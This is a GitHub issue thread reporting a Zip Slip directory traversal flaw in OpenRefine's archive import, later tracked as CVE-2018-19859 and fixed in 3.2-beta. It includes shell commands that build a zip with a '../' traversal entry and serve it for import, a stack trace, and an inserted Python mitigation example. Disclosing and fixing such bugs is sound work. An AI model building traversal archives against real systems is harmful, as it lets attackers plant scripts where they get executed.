
Directory traversal (unsafe unzip) vulnerability #1840

Closed
itsacoderepo opened this issue Nov 20, 2018 · 8 comments

@itsacoderepo

commented Nov 20, 2018

Describe the bug

It is possible to create files outside the temporary folder by importing a zip file containing files with relative paths. This can be used to create scripts and configurations at locations where they can be picked up by applications, other scripts or executed during start up.

Additional information https://snyk.io/research/zip-slip-vulnerability

To Reproduce
Video (zipped video because of GH extension restrictions): openrefine_zip_dir_traversal.zip

Steps to reproduce the behavior:

Create payload and start server on Linux

cd /tmp/
touch "dangerousscript.sh"
zip legitdata.zip "../../../../../../../../tmp/dangerousscript.sh"
python -m http.server 8000

Steps on openrefine

  1. Start openrefine ($ ./refine)
  2. Click on "Create Project"
  3. Click on "Web Addresses (URLs)" (also possible through uploading a local zip file)
  4. Insert a malicious URL, e.g. http://lookslegit.com/cooldata/legitdata.zip
  5. If the file does not exist, the malicious file is silently created
    If the file does exist, openrefine shows a stack trace (see below) on terminal

Current Results

No error nor warning.

Expected behavior

Warn the user about dangerous content in the zip and prevent the creation of the file.

Video

The video is inside a zip file because of GitHub file extension restrictions.

Desktop (please complete the following information):

  • OS: Linux (Arch, Debian)
  • Browser Version: Not important
  • JRE or JDK Version:

openjdk version "1.8.0_171"
OpenJDK Runtime Environment (build 1.8.0_171-8u171-b11-2-b11)
OpenJDK 64-Bit Server VM (build 25.171-b11, mixed mode)

And

openjdk version "1.8.0_192"
OpenJDK Runtime Environment (build 1.8.0_192-b26)
OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)

OpenRefine (please complete the following information):

  • Version 3.0 [TRUNK] and 3.1-beta [TRUNK] (maybe also previous versions)

Stack trace

java.io.FileNotFoundException: /tmp/Jetty_127_0_0_1_3333_webapp____4ulpc9/import/2/raw-data/-2../../../../../../../../tmp/dangerousscript.sh (No such file or directory)
	at java.io.FileOutputStream.open0(Native Method)
	at java.io.FileOutputStream.open(FileOutputStream.java:270)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
	at java.io.FileOutputStream.<init>(FileOutputStream.java:162)
	at com.google.refine.importing.ImportingUtilities.saveStreamToFile(ImportingUtilities.java:591)
	at com.google.refine.importing.ImportingUtilities.explodeArchive(ImportingUtilities.java:749)
	at com.google.refine.importing.ImportingUtilities.postProcessRetrievedFile(ImportingUtilities.java:619)
	at com.google.refine.importing.ImportingUtilities.saveStream(ImportingUtilities.java:512)
	at com.google.refine.importing.ImportingUtilities.download(ImportingUtilities.java:441)
	at com.google.refine.importing.ImportingUtilities.download(ImportingUtilities.java:372)
	at com.google.refine.importing.ImportingUtilities.retrieveContentFromPostRequest(ImportingUtilities.java:285)
	at com.google.refine.importing.ImportingUtilities.loadDataAndPrepareJob(ImportingUtilities.java:141)
	at com.google.refine.importing.DefaultImportingController.doLoadRawData(DefaultImportingController.java:119)
	at com.google.refine.importing.DefaultImportingController.doPost(DefaultImportingController.java:87)
	at com.google.refine.commands.importing.ImportingControllerCommand.doPost(ImportingControllerCommand.java:62)
	at com.google.refine.RefineServlet.service(RefineServlet.java:178)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:820)
	at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
	at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
	at org.mortbay.servlet.UserAgentFilter.doFilter(UserAgentFilter.java:81)
	at org.mortbay.servlet.GzipFilter.doFilter(GzipFilter.java:132)
	at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
	at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
	at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
	at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
	at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
	at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
	at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
	at org.mortbay.jetty.Server.handle(Server.java:326)
	at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
	at org.mortbay.jetty.HttpConnection$RequestHandler.content(HttpConnection.java:938)
	at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:755)
	at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:218)
	at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
	at org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
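The check the reporter asks for in "Expected behavior" (refuse any archive entry whose resolved path leaves the import directory, and write nothing when the archive is hostile), as an added Python example that is not part of this issue or of OpenRefine's Java code. The archive it inspects is constructed in memory; its traversal entry name is modelled on the payload in the report, and the function and variable names are my own.

```python
"""Zip Slip mitigation: validate every entry name before extracting (added example)."""
import io
import os
import tempfile
import zipfile
from typing import List, Optional


class UnsafeZipEntry(ValueError):
    """Raised when an archive entry would be written outside the destination."""


def resolve_entry(dest_dir: str, entry_name: str) -> Optional[str]:
    """Return the absolute on-disk path for entry_name, or None if it escapes dest_dir.

    Both the destination and the would-be target are canonicalised, then the
    target must sit at or below the destination. Absolute names and drive-letter
    names are rejected before joining, because os.path.join would discard
    dest_dir for them.
    """
    if entry_name.startswith(("/", "\\")) or (len(entry_name) > 1 and entry_name[1] == ":"):
        return None
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, entry_name))
    if target == dest or target.startswith(dest + os.sep):
        return target
    return None


def unsafe_entries(zip_bytes: bytes, dest_dir: str) -> List[str]:
    """List every entry name in the archive that would land outside dest_dir."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if resolve_entry(dest_dir, n) is None]


def safe_extract(zip_bytes: bytes, dest_dir: str) -> List[str]:
    """Extract into dest_dir, refusing the whole archive if any entry is unsafe.

    Every name is validated before anything is written, so a hostile archive
    cannot leave a half-extracted tree behind, and the caller gets the full
    list of offending names to report to the user.
    """
    bad = unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise UnsafeZipEntry(f"archive entries escape {dest_dir!r}: {bad}")
    root = os.path.realpath(dest_dir)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = resolve_entry(dest_dir, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, root).replace(os.sep, "/"))
    return written


def build_sample_zip(include_traversal: bool = True) -> bytes:
    """Constructed archive: one legitimate entry plus, optionally, a traversal entry
    whose name is modelled on the payload in the report."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("data/records.csv", "id,name\n1,alice\n")
        if include_traversal:
            zf.writestr("../../../../../../../../tmp/dangerousscript.sh", "#!/bin/sh\n")
    return buf.getvalue()


def demo() -> dict:
    """Run the hostile and the clean archive through safe_extract in a scratch dir."""
    with tempfile.TemporaryDirectory() as dest:
        hostile = build_sample_zip(include_traversal=True)
        bad = unsafe_entries(hostile, dest)
        try:
            safe_extract(hostile, dest)
            rejected = False
        except UnsafeZipEntry:
            rejected = True
        nothing_written = os.listdir(dest) == []  # refusal must leave dest untouched
        written = safe_extract(build_sample_zip(include_traversal=False), dest)
    return {"unsafe": bad, "rejected": rejected,
            "nothing_written": nothing_written, "written": written}


if __name__ == "__main__":
    print(demo())
```

The rejection happens on the entry name alone, before any I/O, which is the property the reporter's "silently created" observation shows is missing: a real extractor should surface the offending names to the user rather than truncate or skip them quietly.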
@wetneb

Member

commented Nov 20, 2018

Thanks for the report!

@itsacoderepo itsacoderepo changed the title Directory traversal ("Zip Slip") vulnerability Directory traversal (unsafe unzip) vulnerability Nov 22, 2018

@jackyq2015 jackyq2015 added the patch label Nov 27, 2018

@jackyq2015 jackyq2015 added this to the 3.5 milestone Nov 27, 2018

@thadguidry

Member

commented Nov 28, 2018

@itsacoderepo Do you recommend a fix such as what Sonarqube did ? SonarSource/sonarqube@08438a2#diff-6d8def68a00bf88a105528765f02fb95

or another method / library ?

@magdmartin

Member

commented Dec 6, 2018

It is also reported under CVE-2018-19859

@wetneb wetneb self-assigned this Dec 6, 2018

wetneb added a commit that referenced this issue Dec 9, 2018

@wetneb wetneb modified the milestones: 3.5, 3.2 Feb 7, 2019

@mdbaehre


commented Mar 1, 2019

Is the CVE-2018-19859 vulnerability fixed in the 3.2-beta? The history above and the bug fix summary for 3.2-beta seem to indicate it has, but you indicate above that you've allocated some work to 3.5. As a result, the CVE record (https://nvd.nist.gov/vuln/detail/CVE-2018-19859) indicates that it won't be fixed until 3.5. My work won't let me use the software until the NIST vulnerabilities are fixed.
Thanks

@wetneb

Member

commented Mar 2, 2019

@mdbaehre Yes this was fixed in 3.2-beta.

@ostephens

Member

commented Mar 4, 2019

I've submitted a request to the CVE database for CVE-2018-19859 to reflect this earlier fix to the vulnerability.

@ostephens

Member

commented Mar 28, 2019

CVE database now updated to indicate that this has been fixed in 3.2-beta: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19859

@wetneb

Member

commented Mar 28, 2019

Fantastic, thanks a lot Owen!
